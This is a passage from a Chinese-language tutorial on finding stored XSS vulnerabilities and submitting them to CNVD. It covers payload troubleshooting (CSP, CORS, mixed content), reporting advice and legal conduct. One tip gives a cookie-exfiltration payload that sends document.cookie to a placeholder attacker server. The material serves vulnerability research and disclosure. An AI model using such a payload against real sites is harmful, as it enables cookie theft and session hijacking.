内容被放在了不会执行JS的上下文中如textarea内部。 2. 存在内容安全策略CSP限制。1. 仔细检查Payload所在的HTML上下文。是不是在script标签的字符串里或者在HTML注释里 2. 按F12打开控制台查看是否有CSP违规的错误信息。CSP会阻止内联脚本执行。弹窗成功但想进一步利用如发请求失败。1. 浏览器同源策略CORS限制。 2. 页面HTTPS但你的接收服务器是HTTP混合内容被阻止。1. 在控制台查看网络请求是否被阻止并查看错误信息。 2. 尝试使用更简单的数据外泄方式如document.locationhttp://yourserver/?document.cookie会跳转较明显。或者确保你的接收服务器也支持HTTPS。6.2 关于CNVD提交的几点深度思考什么是“通用漏洞”CNVD更倾向于收录影响多个厂商或广泛使用产品的漏洞。一个自己写的、只有一个人访问的个人网站存在XSS这不算“通用”。但一个下载量过万的开源博客系统、一个用户量庞大的CMS的某个功能存在XSS这就具备了通用性。在提交时要强调受影响产品的广泛性和版本范围。漏洞的危害证明要“恰到好处”。如前所述证明到“可执行任意代码”和“存在数据外泄风险”即可。切勿为了证明危害而真正去窃取测试环境的数据或进行破坏性操作。在报告中描述潜在危害如“可导致用户Cookie被盗进而被劫持会话”是必要的。关注漏洞的利用前提。有些存储型XSS可能需要高级别权限如管理员才能注入但所有用户都会受影响。有些则是普通用户即可注入。在报告中要写清楚“利用条件”这会影响漏洞的评分和严重等级。持续学习与积累。第一个漏洞总是最难的。从靶场开始逐步过渡到真实世界的开源软件。多阅读别人的漏洞分析报告如Seebug、CNVD官网已公开的漏洞详情学习他们的挖掘思路和报告写法。加入一些安全社区与他人交流。挖掘漏洞的过程本质上是一个“理解应用如何工作”和“寻找逻辑意外”的过程。存储型XSS作为Web安全的经典课题掌握了它你就打开了理解客户端安全、浏览器安全、前后端交互安全的一扇大门。这条路需要耐心、细致的观察力和不断试错的精神。当你提交的第一个漏洞被确认并收录时那种成就感会是对你所有努力的最佳回报。记住保持合法合规的初心专注于技术本身这份热爱会带你走得更远。
